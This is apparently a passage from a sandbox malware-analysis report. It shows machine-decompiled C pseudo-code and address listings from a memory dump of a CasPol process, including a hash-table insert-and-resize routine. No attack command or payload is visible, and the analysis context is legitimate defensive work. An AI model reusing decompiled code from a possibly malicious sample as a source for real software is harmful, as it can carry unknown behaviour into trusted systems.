																 *(_t528 - 0xa8) =  *(_t469 - 8);
																_t402 =  *_t469 & 0x0000ffff;
																 *(_t528 - 0xac) = _t402;
																_t511 = _t511 + ((_t402 & 0x0000ffff) + 0x0000000f & 0xfffffff8);
															}
														}
													}
													__eflags = _t511 -  *(_t528 - 0xe4);
													if(_t511 <  *(_t528 - 0xe4)) {
														break;
													}
													_t397 =  *(_t528 - 0x88) + 1;
													 *(_t528 - 0x88) = _t397;
													_t469 = _t469 + 0x10;
													__eflags = _t397 -  *(_t528 + 0x1c);
													_t392 =  *(_t528 - 0xa2);
													if(_t397 <  *(_t528 + 0x1c)) {
														continue;
													}
													goto L45;
												}
												_t475 = 0x216;
												 *(_t528 - 0x74) = 0x216;
												goto L45;
											}
										} else {
											asm("lock dec dword [eax+ecx*8+0x4]");
											goto L16;
										}
									}
									_t491 = E016F4CAB(_t306, _t528 - 0xa4);
									 *(_t528 - 0x74) = _t491;
									__eflags = _t491;
									if(_t491 != 0) {
										goto L91;
									} else {
										_t474 =  *((intOrPtr*)(_t528 - 0x94));
										goto L20;
									}
								}
								L16:
								 *(_t528 - 0x74) = 0x1069;
								L93:
								_t298 =  *(_t528 - 0xd0) + 1;
								 *(_t528 - 0xd0) = _t298;
								_t474 = _t474 + _t511;
								 *((intOrPtr*)(_t528 - 0x94)) = _t474;
								_t494 = 4;
								__eflags = _t298 - _t494;
								if(_t298 >= _t494) {
									goto L100;
								}
								_t494 =  *(_t528 - 0xcc);
								_t435 = _t298;
								continue;
							}
							__eflags = _t494[2] | _t494[3];
							if((_t494[2] | _t494[3]) == 0) {
								goto L15;
							}
							goto L12;
						}
						__eflags = _t301;
						if(_t301 != 0) {
							goto L92;
						}
						goto L10;
						L92:
						goto L93;
					}
				} else {
					_push(0x57);
					L101:
					return E0167D130(_t427, _t494, _t511);
				}
			}










































































                                                                0x016f5ba5
                                                                0x016f5baa
                                                                0x016f5baf
                                                                0x016f5bb4
                                                                0x016f5bb6
                                                                0x016f5bbc
                                                                0x016f5bbe
                                                                0x016f5bc4
                                                                0x016f5bcd
                                                                0x016f5bd3
                                                                0x016f5bd6
                                                                0x016f5bdc
                                                                0x016f5be0
                                                                0x016f5be3
                                                                0x016f5beb
                                                                0x016f5bf2
                                                                0x016f5bf8
                                                                0x016f5bfe
                                                                0x016f5c04
                                                                0x016f5c0e
                                                                0x016f5c18
                                                                0x016f5c1f
                                                                0x016f5c25
                                                                0x016f5c2a
                                                                0x016f5c2c
                                                                0x016f5c32
                                                                0x016f5c3a
                                                                0x016f5c3f
                                                                0x016f5c42
                                                                0x016f5c48
                                                                0x016f5c5b
                                                                0x016f5c5b
                                                                0x016f5c2c
                                                                0x016f5cb7
                                                                0x016f5cb9
                                                                0x016f5cbf
                                                                0x016f5cc2
                                                                0x016f5cca
                                                                0x016f5ccb
                                                                0x016f5ccb
                                                                0x016f5cd1
                                                                0x016f5cd7
                                                                0x016f5cda
                                                                0x016f5ce1
                                                                0x016f5ce4
                                                                0x016f5ce7
                                                                0x016f5ced
                                                                0x016f5cf3
                                                                0x016f5cf9
                                                                0x016f5cff
                                                                0x016f5d08
                                                                0x016f5d0a
                                                                0x016f5d0e
                                                                0x016f5d10
                                                                0x00000000
                                                                0x00000000
                                                                0x016f5d16
                                                                0x016f5d1a
                                                                0x00000000
                                                                0x00000000
                                                                0x016f5d20
                                                                0x016f5d22
                                                                0x016f5d25
                                                                0x016f5d2f
                                                                0x016f5d2f
                                                                0x016f5d33
                                                                0x016f5d3d
                                                                0x016f5d49
                                                                0x016f5d4b
                                                                0x00000000
                                                                0x00000000
                                                                0x016f5d5a
                                                                0x016f5d5d
                                                                0x016f5d60
                                                                0x00000000
                                                                0x00000000
                                                                0x016f5d66
                                                                0x016f5d69
                                                                0x00000000
                                                                0x00000000
                                                                0x016f5d6f
                                                                0x016f5d6f
                                                                0x016f5d73
                                                                0x016f5d79
                                                                0x016f5d7f
                                                                0x016f5d86
                                                                0x016f5d95
                                                                0x016f5d98
                                                                0x016f5dba
                                                                0x016f5dcb
                                                                0x016f5dce
                                                                0x016f5dd3
                                                                0x016f5dd6
                                                                0x016f5dd8
                                                                0x016f5de6
                                                                0x016f5dec
                                                                0x016f5dee
                                                                0x016f5df1
                                                                0x016f5df3
                                                                0x016f635a
                                                                0x016f635a
                                                                0x00000000
                                                                0x016f635a
                                                                0x016f5dfe
                                                                0x016f5e02
                                                                0x016f5e05
                                                                0x016f5e07
                                                                0x016f5e10
                                                                0x016f5e13
                                                                0x016f5e1b
                                                                0x016f5e1c
                                                                0x016f5e21
                                                                0x016f5e22
                                                                0x016f5e23
                                                                0x016f5e25
                                                                0x016f5e2a
                                                                0x016f5e2c
                                                                0x016f5e2e
                                                                0x016f5e36
                                                                0x016f5e39
                                                                0x016f5e42
                                                                0x016f5e47
                                                                0x016f5e4d
                                                                0x016f5e54
                                                                0x016f5e54
                                                                0x016f5e54
                                                                0x016f5e2e
                                                                0x016f5e5c
                                                                0x016f5e5f
                                                                0x016f5e62
                                                                0x016f5e64
                                                                0x016f5e6b
                                                                0x016f5e70
                                                                0x016f5e7a
                                                                0x016f5e7a
                                                                0x016f5e7a
                                                                0x016f5e6b
                                                                0x016f5e7e
                                                                0x016f5e7f
                                                                0x016f5e7f
                                                                0x016f5e81
                                                                0x016f5e87
                                                                0x016f5e8b
                                                                0x016f5e8c
                                                                0x016f5e8c
                                                                0x016f5e8c
                                                                0x016f5e9a
                                                                0x016f5e9c
                                                                0x016f5ea2
                                                                0x016f5ea6
                                                                0x016f5f50
                                                                0x016f5f50
                                                                0x016f5f57
                                                                0x016f5f66
                                                                0x016f5f66
                                                                0x016f5f66
                                                                0x016f5f68
                                                                0x016f5f6a
                                                                0x016f63d0
                                                                0x00000000
                                                                0x016f5f70
                                                                0x016f5f70
                                                                0x016f5f91
                                                                0x016f5f9c
                                                                0x016f5f9e
                                                                0x016f5fa4
                                                                0x016f5fa6
                                                                0x016f638c
                                                                0x016f6392
                                                                0x016f63a1
                                                                0x016f63a7
                                                                0x016f63af
                                                                0x016f63af
                                                                0x016f63bd
                                                                0x016f63d8
                                                                0x00000000
                                                                0x016f63d8
                                                                0x016f5fac
                                                                0x016f5fb2
                                                                0x016f5fb4
                                                                0x016f5fbd
                                                                0x016f5fc6
                                                                0x016f5fce
                                                                0x016f5fd4
                                                                0x016f5fdc
                                                                0x016f5fec
                                                                0x016f5fed
                                                                0x016f5fee
                                                                0x016f5fef
                                                                0x016f5ff9
                                                                0x016f5ffa
                                                                0x016f5ffb
                                                                0x016f5ffc
                                                                0x016f6000
                                                                0x016f6004
                                                                0x016f6012
                                                                0x016f6012
                                                                0x016f6018
                                                                0x016f6019
                                                                0x016f601a
                                                                0x016f601b
                                                                0x016f601c
                                                                0x016f6020
                                                                0x016f6059
                                                                0x016f605c
                                                                0x016f6061
                                                                0x016f6061
                                                                0x016f6022
                                                                0x016f6022
                                                                0x016f6022
                                                                0x016f6025
                                                                0x016f602a
                                                                0x016f602b
                                                                0x016f6031
                                                                0x016f6037
                                                                0x016f6038
                                                                0x016f603e
                                                                0x016f6048
                                                                0x016f6049
                                                                0x016f604a
                                                                0x016f604b
                                                                0x016f604c
                                                                0x016f604d
                                                                0x016f6053
                                                                0x016f6054
                                                                0x016f6054
                                                                0x016f6062
                                                                0x016f6065
                                                                0x016f6067
                                                                0x016f606a
                                                                0x016f6070
                                                                0x016f6075
                                                                0x016f6076
                                                                0x016f6081
                                                                0x016f6087
                                                                0x016f6095
                                                                0x016f6099
                                                                0x016f609e
                                                                0x016f60a4
                                                                0x016f60ae
                                                                0x016f60b0
                                                                0x016f60b3
                                                                0x016f60b6
                                                                0x016f60b8
                                                                0x016f60ba
                                                                0x016f60ba
                                                                0x016f60ba
                                                                0x016f60ba
                                                                0x016f60be
                                                                0x016f60c0
                                                                0x016f60c5
                                                                0x016f60c5
                                                                0x016f60c5
                                                                0x016f60c6
                                                                0x016f60cd
                                                                0x016f6114
                                                                0x016f60cf
                                                                0x016f60cf
                                                                0x016f60d4
                                                                0x016f60d5
                                                                0x016f60da
                                                                0x016f60db
                                                                0x016f60e1
                                                                0x016f60e2
                                                                0x016f60e8
                                                                0x016f60f8
                                                                0x016f60fd
                                                                0x016f60fe
                                                                0x016f6102
                                                                0x016f6104
                                                                0x016f6107
                                                                0x016f6109
                                                                0x016f610b
                                                                0x016f610b
                                                                0x016f610b
                                                                0x016f610b
                                                                0x016f610f
                                                                0x016f610f
                                                                0x016f6117
                                                                0x016f611a
                                                                0x016f611f
                                                                0x016f6125
                                                                0x016f6134
                                                                0x016f6139
                                                                0x016f613f
                                                                0x016f6146
                                                                0x016f6148
                                                                0x016f614b
                                                                0x016f614d
                                                                0x016f614f
                                                                0x016f614f
                                                                0x016f614f
                                                                0x016f614f
                                                                0x016f6153
                                                                0x016f6159
                                                                0x016f6159
                                                                0x016f615c
                                                                0x016f6163
                                                                0x016f6169
                                                                0x016f616c
                                                                0x016f6172
                                                                0x016f6181
                                                                0x016f6186
                                                                0x016f6187
                                                                0x016f618b
                                                                0x016f6191
                                                                0x016f6195
                                                                0x016f61a3
                                                                0x016f61bb
                                                                0x016f61c0
                                                                0x016f61c3
                                                                0x016f61cc
                                                                0x016f61d0
                                                                0x016f61dc
                                                                0x016f61de
                                                                0x016f61e1
                                                                0x016f61e4
                                                                0x016f61e6
                                                                0x016f61e8
                                                                0x016f61e8
                                                                0x016f61e8
                                                                0x016f61e8
                                                                0x016f61e6
                                                                0x016f61ec
                                                                0x016f61f3
                                                                0x016f6203
                                                                0x016f6209
                                                                0x016f620a
                                                                0x016f6216
                                                                0x016f621d
                                                                0x016f6227
                                                                0x016f6241
                                                                0x016f6246
                                                                0x016f624c
                                                                0x016f6257
                                                                0x016f6259
                                                                0x016f625c
                                                                0x016f625e
                                                                0x016f6260
                                                                0x016f6260
                                                                0x016f6260
                                                                0x016f6260
                                                                0x016f625e
                                                                0x016f6264
                                                                0x016f6267
                                                                0x016f6269
                                                                0x016f6315
                                                                0x016f6315
                                                                0x016f631b
                                                                0x016f631e
                                                                0x016f6324
                                                                0x016f6327
                                                                0x016f632f
                                                                0x016f6330
                                                                0x016f6333
                                                                0x016f633a
                                                                0x016f633c
                                                                0x016f6335
                                                                0x016f6335
                                                                0x016f6335
                                                                0x016f633f
                                                                0x016f6342
                                                                0x016f634c
                                                                0x016f6352
                                                                0x016f6355
                                                                0x016f6355
                                                                0x016f6359
                                                                0x00000000
                                                                0x016f626f
                                                                0x016f6275
                                                                0x016f6275
                                                                0x016f6278
                                                                0x016f627e
                                                                0x016f627e
                                                                0x016f6281
                                                                0x016f6287
                                                                0x016f628d
                                                                0x016f6298
                                                                0x016f629c
                                                                0x016f62a2
                                                                0x016f629e
                                                                0x016f629e
                                                                0x016f629e
                                                                0x016f62a7
                                                                0x016f62a7
                                                                0x016f62aa
                                                                0x016f62b0
                                                                0x016f62f0
                                                                0x016f62f0
                                                                0x016f62f2
                                                                0x016f62f8
                                                                0x016f62fd
                                                                0x016f62b2
                                                                0x016f62b2
                                                                0x016f62b2
                                                                0x016f62b5
                                                                0x016f62dd
                                                                0x016f62e2
                                                                0x016f62e5
                                                                0x016f62b7
                                                                0x016f62b8
                                                                0x016f62bb
                                                                0x016f62bd
                                                                0x016f62c0
                                                                0x016f62c4
                                                                0x016f62cd
                                                                0x016f62cd
                                                                0x016f62c0
                                                                0x016f62bb
                                                                0x016f62b5
                                                                0x016f6302
                                                                0x016f6303
                                                                0x016f6305
                                                                0x016f6305
                                                                0x016f6305
                                                                0x016f630c
                                                                0x016f630c
                                                                0x00000000
                                                                0x016f627e
                                                                0x016f6269
                                                                0x016f5eac
                                                                0x016f5ebb
                                                                0x016f5ebe
                                                                0x016f5ecb
                                                                0x016f5ecb
                                                                0x016f5ece
                                                                0x016f5ece
                                                                0x016f5ed4
                                                                0x016f5ed7
                                                                0x016f5ed9
                                                                0x016f5edb
                                                                0x016f5edb
                                                                0x016f5ee1
                                                                0x016f5ee1
                                                                0x016f5ee3
                                                                0x016f5f20
                                                                0x016f5f20
                                                                0x016f5ee5
                                                                0x016f5ee5
                                                                0x016f5ee5
                                                                0x016f5ee8
                                                                0x016f5f11
                                                                0x016f5f18
                                                                0x016f5eea
                                                                0x016f5eea
                                                                0x016f5eed
                                                                0x016f5ef2
                                                                0x016f5ef8
                                                                0x016f5efb
                                                                0x016f5f0a
                                                                0x016f5f0a
                                                                0x016f5eed
                                                                0x016f5ee8
                                                                0x016f5f22
                                                                0x016f5f28
                                                                0x00000000
                                                                0x00000000
                                                                0x016f5f30
                                                                0x016f5f31
                                                                0x016f5f37
                                                                0x016f5f3a
                                                                0x016f5f3d
                                                                0x016f5f44
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x016f5f46
                                                                0x016f5f48
                                                                0x016f5f4d
                                                                0x00000000
                                                                0x016f5f4d
                                                                0x016f5dda
                                                                0x016f5ddf
                                                                0x00000000
                                                                0x016f5ddf
                                                                0x016f5dd8
                                                                0x016f5da7
                                                                0x016f5da9
                                                                0x016f5dac
                                                                0x016f5dae
                                                                0x00000000
                                                                0x016f5db4
                                                                0x016f5db4
                                                                0x00000000
                                                                0x016f5db4
                                                                0x016f5dae
                                                                0x016f5d88
                                                                0x016f5d8d
                                                                0x016f6363
                                                                0x016f6369
                                                                0x016f636a
                                                                0x016f6370
                                                                0x016f6372
                                                                0x016f637a
                                                                0x016f637b
                                                                0x016f637d
                                                                0x00000000
                                                                0x00000000
                                                                0x016f637f
                                                                0x016f6385
                                                                0x00000000
                                                                0x016f6385
                                                                0x016f5d38
                                                                0x016f5d3b
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x016f5d3b
                                                                0x016f5d27
                                                                0x016f5d29
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x016f6360
                                                                0x00000000
                                                                0x016f6360
                                                                0x016f5c10
                                                                0x016f5c10
                                                                0x016f63da
                                                                0x016f63e5
                                                                0x016f63e5

                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 1ae6dfbf014f66fb8614edc15360fd5777dfe8f504042597d0813a5fb51eacaa
                                                                • Instruction ID: 6580b97a50c3ced4978322007b87620b9cb4deddf92c832d8b3ddf744d38607d
                                                                • Opcode Fuzzy Hash: 1ae6dfbf014f66fb8614edc15360fd5777dfe8f504042597d0813a5fb51eacaa
                                                                • Instruction Fuzzy Hash: FA4237759002298FDB24CF68CC80BA9BBB1FF49304F1581AEDA4DAB342D7759A85CF50
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 016FE824 Relevance: .5, Instructions: 493COMMONCrypto
                                                                Download Yara Rule
                                                                C-Code - Quality: 50%
                                                                			E016FE824(signed int __ecx, signed int* __edx) {
				signed int _v8;
				signed char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				unsigned int _v44;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t177;
				signed int _t179;
				unsigned int _t202;
				signed char _t207;
				signed char _t210;
				signed int _t230;
				void* _t244;
				unsigned int _t247;
				signed int _t288;
				signed int _t289;
				signed int _t291;
				signed char _t293;
				signed char _t295;
				signed char _t298;
				intOrPtr* _t303;
				signed int _t310;
				signed char _t316;
				signed int _t319;
				signed char _t323;
				signed char _t330;
				signed int _t334;
				signed int _t337;
				signed int _t341;
				signed char _t345;
				signed char _t347;
				signed int _t353;
				signed char _t354;
				void* _t383;
				signed char _t385;
				signed char _t386;
				unsigned int _t392;
				signed int _t393;
				signed int _t395;
				signed int _t398;
				signed int _t399;
				signed int _t401;
				unsigned int _t403;
				void* _t404;
				unsigned int _t405;
				signed int _t406;
				signed char _t412;
				unsigned int _t413;
				unsigned int _t418;
				void* _t419;
				void* _t420;
				void* _t421;
				void* _t422;
				void* _t423;
				signed char* _t425;
				signed int _t426;
				signed int _t428;
				unsigned int _t430;
				signed int _t431;
				signed int _t433;

				_v8 =  *0x171d360 ^ _t433;
				_v40 = __ecx;
				_v16 = __edx;
				_t289 = 0x4cb2f;
				_t425 = __edx[1];
				_t403 =  *__edx << 2;
				if(_t403 < 8) {
					L3:
					_t404 = _t403 - 1;
					if(_t404 == 0) {
						L16:
						_t289 = _t289 * 0x25 + ( *_t425 & 0x000000ff);
						L17:
						_t426 = _v40;
						_v20 = _t426 + 0x1c;
						_t177 = L0164FAD0(_t426 + 0x1c);
						_t385 = 0;
						while(1) {
							L18:
							_t405 =  *(_t426 + 4);
							_t179 = (_t177 | 0xffffffff) << (_t405 & 0x0000001f);
							_t316 = _t289 & _t179;
							_v24 = _t179;
							_v32 = _t316;
							_v12 = _t316 >> 0x18;
							_v36 = _t316 >> 0x10;
							_v28 = _t316 >> 8;
							if(_t385 != 0) {
								goto L21;
							}
							_t418 = _t405 >> 5;
							if(_t418 == 0) {
								_t406 = 0;
								L31:
								if(_t406 == 0) {
									L35:
									E0164FA00(_t289, _t316, _t406, _t426 + 0x1c);
									 *0x171b1e0(0xc +  *_v16 * 4,  *((intOrPtr*)(_t426 + 0x28)));
									_t319 =  *((intOrPtr*)( *((intOrPtr*)(_t426 + 0x20))))();
									_v36 = _t319;
									if(_t319 != 0) {
										asm("stosd");
										asm("stosd");
										asm("stosd");
										_t408 = _v16;
										 *(_t319 + 8) =  *(_t319 + 8) & 0xff000001 | 0x00000001;
										 *((char*)(_t319 + 0xb)) =  *_v16;
										 *(_t319 + 4) = _t289;
										_t53 = _t319 + 0xc; // 0xc
										E01642280(E0166F3E0(_t53,  *((intOrPtr*)(_v16 + 4)),  *_v16 << 2), _v20);
										_t428 = _v40;
										_t386 = 0;
										while(1) {
											L38:
											_t202 =  *(_t428 + 4);
											_v16 = _v16 | 0xffffffff;
											_v16 = _v16 << (_t202 & 0x0000001f);
											_t323 = _v16 & _t289;
											_v20 = _t323;
											_v20 = _v20 >> 0x18;
											_v28 = _t323;
											_v28 = _v28 >> 0x10;
											_v12 = _t323;
											_v12 = _v12 >> 8;
											_v32 = _t323;
											if(_t386 != 0) {
												goto L41;
											}
											_t247 = _t202 >> 5;
											_v24 = _t247;
											if(_t247 == 0) {
												_t412 = 0;
												L50:
												if(_t412 == 0) {
													L53:
													_t291 =  *(_t428 + 4);
													_v28 =  *((intOrPtr*)(_t428 + 0x28));
													_v44 =  *(_t428 + 0x24);
													_v32 =  *((intOrPtr*)(_t428 + 0x20));
													_t207 = _t291 >> 5;
													if( *_t428 < _t207 + _t207) {
														L74:
														_t430 = _t291 >> 5;
														_t293 = _v36;
														_t210 = (_t207 | 0xffffffff) << (_t291 & 0x0000001f) &  *(_t293 + 4);
														_v44 = _t210;
														_t159 = _t430 - 1; // 0xffffffdf
														_t428 = _v40;
														_t330 =  *(_t428 + 8);
														_t386 = _t159 & (_v44 >> 0x00000018) + ((_v44 >> 0x00000010 & 0x000000ff) + ((_t210 >> 0x00000008 & 0x000000ff) + ((_t210 & 0x000000ff) + 0x00b15dcb) * 0x00000025) * 0x00000025) * 0x00000025;
														_t412 = _t293;
														 *_t293 =  *(_t330 + _t386 * 4);
														 *(_t330 + _t386 * 4) = _t293;
														 *_t428 =  *_t428 + 1;
														_t289 = 0;
														L75:
														E0163FFB0(_t289, _t412, _t428 + 0x1c);
														if(_t289 != 0) {
															_t428 =  *(_t428 + 0x24);
															 *0x171b1e0(_t289,  *((intOrPtr*)(_t428 + 0x28)));
															 *_t428();
														}
														L77:
														return E0166B640(_t412, _t289, _v8 ^ _t433, _t386, _t412, _t428);
													}
													_t334 = 2;
													_t207 = E0165F3D5( &_v24, _t207 * _t334, _t207 * _t334 >> 0x20);
													if(_t207 < 0) {
														goto L74;
													}
													_t413 = _v24;
													if(_t413 < 4) {
														_t413 = 4;
													}
													 *0x171b1e0(_t413 << 2, _v28);
													_t207 =  *_v32();
													_t386 = _t207;
													_v16 = _t386;
													if(_t386 == 0) {
														_t291 =  *(_t428 + 4);
														if(_t291 >= 0x20) {
															goto L74;
														}
														_t289 = _v36;
														_t412 = 0;
														goto L75;
													} else {
														_t108 = _t413 - 1; // 0x3
														_t337 = _t108;
														if((_t413 & _t337) == 0) {
															L62:
															if(_t413 > 0x4000000) {
																_t413 = 0x4000000;
															}
															_t295 = _t386;
															_v24 = _v24 & 0x00000000;
															_t392 = _t413 << 2;
															_t230 = _t428 | 0x00000001;
															_t393 = _t392 >> 2;
															asm("sbb ecx, ecx");
															_t341 =  !(_v16 + _t392) & _t393;
															if(_t341 <= 0) {
																L67:
																_t395 = (_t393 | 0xffffffff) << ( *(_t428 + 4) & 0x0000001f);
																_v32 = _t395;
																_v20 = 0;
																if(( *(_t428 + 4) & 0xffffffe0) <= 0) {
																	L72:
																	_t345 =  *(_t428 + 8);
																	_t207 = _v16;
																	_t291 =  *(_t428 + 4) & 0x0000001f | _t413 << 0x00000005;
																	 *(_t428 + 8) = _t207;
																	 *(_t428 + 4) = _t291;
																	if(_t345 != 0) {
																		 *0x171b1e0(_t345, _v28);
																		_t207 =  *_v44();
																		_t291 =  *(_t428 + 4);
																	}
																	goto L74;
																} else {
																	goto L68;
																}
																do {
																	L68:
																	_t298 =  *(_t428 + 8);
																	_t431 = _v20;
																	_v12 = _t298;
																	while(1) {
																		_t347 =  *(_t298 + _t431 * 4);
																		_v24 = _t347;
																		if((_t347 & 0x00000001) != 0) {
																			goto L71;
																		}
																		 *(_t298 + _t431 * 4) =  *_t347;
																		_t300 =  *(_t347 + 4) & _t395;
																		_t398 = _v16;
																		_t353 = _t413 - 0x00000001 & (( *(_t347 + 4) & _t395) >> 0x00000018) + ((( *(_t347 + 4) & _t395) >> 0x00000010 & 0x000000ff) + ((( *(_t347 + 4) & _t395) >> 0x00000008 & 0x000000ff) + ((_t300 & 0x000000ff) + 0x00b15dcb) * 0x00000025) * 0x00000025) * 0x00000025;
																		_t303 = _v24;
																		 *_t303 =  *((intOrPtr*)(_t398 + _t353 * 4));
																		 *((intOrPtr*)(_t398 + _t353 * 4)) = _t303;
																		_t395 = _v32;
																		_t298 = _v12;
																	}
																	L71:
																	_v20 = _t431 + 1;
																	_t428 = _v40;
																} while (_v20 <  *(_t428 + 4) >> 5);
																goto L72;
															} else {
																_t399 = _v24;
																do {
																	_t399 = _t399 + 1;
																	 *_t295 = _t230;
																	_t295 = _t295 + 4;
																} while (_t399 < _t341);
																goto L67;
															}
														}
														_t354 = _t337 | 0xffffffff;
														if(_t413 == 0) {
															L61:
															_t413 = 1 << _t354;
															goto L62;
														} else {
															goto L60;
														}
														do {
															L60:
															_t354 = _t354 + 1;
															_t413 = _t413 >> 1;
														} while (_t413 != 0);
														goto L61;
													}
												}
												_t89 = _t412 + 8; // 0x8
												_t244 = E016FE7A8(_t89);
												_t289 = _v36;
												if(_t244 == 0) {
													_t412 = 0;
												}
												goto L75;
											}
											_t386 =  *(_t428 + 8) + (_v24 - 0x00000001 & (_v20 & 0x000000ff) + 0x164b2f3f + (((_t323 & 0x000000ff) * 0x00000025 + (_v12 & 0x000000ff)) * 0x00000025 + (_v28 & 0x000000ff)) * 0x00000025) * 4;
											_t323 = _v32;
											while(1) {
												L41:
												_t386 =  *_t386;
												_v12 = _t386;
												if((_t386 & 0x00000001) != 0) {
													break;
												}
												if(_t323 == ( *(_t386 + 4) & _v16)) {
													L45:
													if(_t386 == 0) {
														goto L53;
													}
													if(E016FE7EB(_t386, _t408) != 0) {
														_t412 = _v12;
														goto L50;
													}
													_t386 = _v12;
													goto L38;
												}
											}
											_t386 = 0;
											_v12 = 0;
											goto L45;
										}
									}
									_t412 = 0;
									goto L77;
								}
								_t38 = _t406 + 8; // 0x8
								_t364 = _t38;
								if(E016FE7A8(_t38) == 0) {
									_t406 = 0;
								}
								E0164FA00(_t289, _t364, _t406, _v20);
								goto L77;
							}
							_t24 = _t418 - 1; // -1
							_t385 =  *((intOrPtr*)(_t426 + 8)) + (_t24 & (_v12 & 0x000000ff) + 0x164b2f3f + (((_t316 & 0x000000ff) * 0x00000025 + (_v28 & 0x000000ff)) * 0x00000025 + (_v36 & 0x000000ff)) * 0x00000025) * 4;
							_t316 = _v32;
							L21:
							_t406 = _v24;
							while(1) {
								_t385 =  *_t385;
								_v12 = _t385;
								if((_t385 & 0x00000001) != 0) {
									break;
								}
								if(_t316 == ( *(_t385 + 4) & _t406)) {
									L26:
									if(_t385 == 0) {
										goto L35;
									}
									_t177 = E016FE7EB(_t385, _v16);
									if(_t177 != 0) {
										_t406 = _v12;
										goto L31;
									}
									_t385 = _v12;
									goto L18;
								}
							}
							_t385 = 0;
							_v12 = 0;
							goto L26;
						}
					}
					_t419 = _t404 - 1;
					if(_t419 == 0) {
						L15:
						_t289 = _t289 * 0x25 + ( *_t425 & 0x000000ff);
						_t425 =  &(_t425[1]);
						goto L16;
					}
					_t420 = _t419 - 1;
					if(_t420 == 0) {
						L14:
						_t289 = _t289 * 0x25 + ( *_t425 & 0x000000ff);
						_t425 =  &(_t425[1]);
						goto L15;
					}
					_t421 = _t420 - 1;
					if(_t421 == 0) {
						L13:
						_t289 = _t289 * 0x25 + ( *_t425 & 0x000000ff);
						_t425 =  &(_t425[1]);
						goto L14;
					}
					_t422 = _t421 - 1;
					if(_t422 == 0) {
						L12:
						_t289 = _t289 * 0x25 + ( *_t425 & 0x000000ff);
						_t425 =  &(_t425[1]);
						goto L13;
					}
					_t423 = _t422 - 1;
					if(_t423 == 0) {
						L11:
						_t289 = _t289 * 0x25 + ( *_t425 & 0x000000ff);
						_t425 =  &(_t425[1]);
						goto L12;
					}
					if(_t423 != 1) {
						goto L17;
					} else {
						_t289 = _t289 * 0x25 + ( *_t425 & 0x000000ff);
						_t425 =  &(_t425[1]);
						goto L11;
					}
				} else {
					_t401 = _t403 >> 3;
					_t403 = _t403 + _t401 * 0xfffffff8;
					do {
						_t383 = ((((((_t425[1] & 0x000000ff) * 0x25 + (_t425[2] & 0x000000ff)) * 0x25 + (_t425[3] & 0x000000ff)) * 0x25 + (_t425[4] & 0x000000ff)) * 0x25 + (_t425[5] & 0x000000ff)) * 0x25 + (_t425[6] & 0x000000ff)) * 0x25 - _t289 * 0x2fe8ed1f;
						_t310 = ( *_t425 & 0x000000ff) * 0x1a617d0d;
						_t288 = _t425[7] & 0x000000ff;
						_t425 =  &(_t425[8]);
						_t289 = _t310 + _t383 + _t288;
						_t401 = _t401 - 1;
					} while (_t401 != 0);
					goto L3;
				}
			}






































































                                                                0x016fe833
                                                                0x016fe839
                                                                0x016fe83e
                                                                0x016fe841
                                                                0x016fe848
                                                                0x016fe84b
                                                                0x016fe851
                                                                0x016fe8b2
                                                                0x016fe8b2
                                                                0x016fe8b5
                                                                0x016fe90b
                                                                0x016fe911
                                                                0x016fe913
                                                                0x016fe913
                                                                0x016fe91a
                                                                0x016fe91d
                                                                0x016fe922
                                                                0x016fe924
                                                                0x016fe924
                                                                0x016fe924
                                                                0x016fe92f
                                                                0x016fe933
                                                                0x016fe935
                                                                0x016fe93a
                                                                0x016fe940
                                                                0x016fe948
                                                                0x016fe950
                                                                0x016fe955
                                                                0x00000000
                                                                0x00000000
                                                                0x016fe957
                                                                0x016fe95c
                                                                0x016fe9cb
                                                                0x016fe9d2
                                                                0x016fe9d4
                                                                0x016fe9f2
                                                                0x016fe9f6
                                                                0x016fea10
                                                                0x016fea18
                                                                0x016fea1a
                                                                0x016fea1f
                                                                0x016fea2c
                                                                0x016fea2d
                                                                0x016fea2e
                                                                0x016fea32
                                                                0x016fea3d
                                                                0x016fea42
                                                                0x016fea45
                                                                0x016fea51
                                                                0x016fea60
                                                                0x016fea65
                                                                0x016fea68
                                                                0x016fea6a
                                                                0x016fea6a
                                                                0x016fea6a
                                                                0x016fea6f
                                                                0x016fea76
                                                                0x016fea7c
                                                                0x016fea7e
                                                                0x016fea81
                                                                0x016fea85
                                                                0x016fea88
                                                                0x016fea8c
                                                                0x016fea8f
                                                                0x016fea93
                                                                0x016fea98
                                                                0x00000000
                                                                0x00000000
                                                                0x016fea9a
                                                                0x016fea9d
                                                                0x016feaa2
                                                                0x016feb0e
                                                                0x016feb15
                                                                0x016feb17
                                                                0x016feb33
                                                                0x016feb36
                                                                0x016feb39
                                                                0x016feb3f
                                                                0x016feb45
                                                                0x016feb4a
                                                                0x016feb52
                                                                0x016fecb1
                                                                0x016fecb9
                                                                0x016fecbe
                                                                0x016fecc3
                                                                0x016fecc6
                                                                0x016feceb
                                                                0x016fecee
                                                                0x016fecf9
                                                                0x016fecfe
                                                                0x016fed00
                                                                0x016fed05
                                                                0x016fed07
                                                                0x016fed0a
                                                                0x016fed0c
                                                                0x016fed0e
                                                                0x016fed12
                                                                0x016fed19
                                                                0x016fed1e
                                                                0x016fed24
                                                                0x016fed2a
                                                                0x016fed2a
                                                                0x016fed2c
                                                                0x016fed3e
                                                                0x016fed3e
                                                                0x016feb5a
                                                                0x016feb62
                                                                0x016feb69
                                                                0x00000000
                                                                0x00000000
                                                                0x016feb6f
                                                                0x016feb75
                                                                0x016feb79
                                                                0x016feb79
                                                                0x016feb88
                                                                0x016feb8e
                                                                0x016feb90
                                                                0x016feb92
                                                                0x016feb97
                                                                0x016fed3f
                                                                0x016fed45
                                                                0x00000000
                                                                0x00000000
                                                                0x016fed4b
                                                                0x016fed4e
                                                                0x00000000
                                                                0x016feb9d
                                                                0x016feb9d
                                                                0x016feb9d
                                                                0x016feba2
                                                                0x016febb5
                                                                0x016febbc
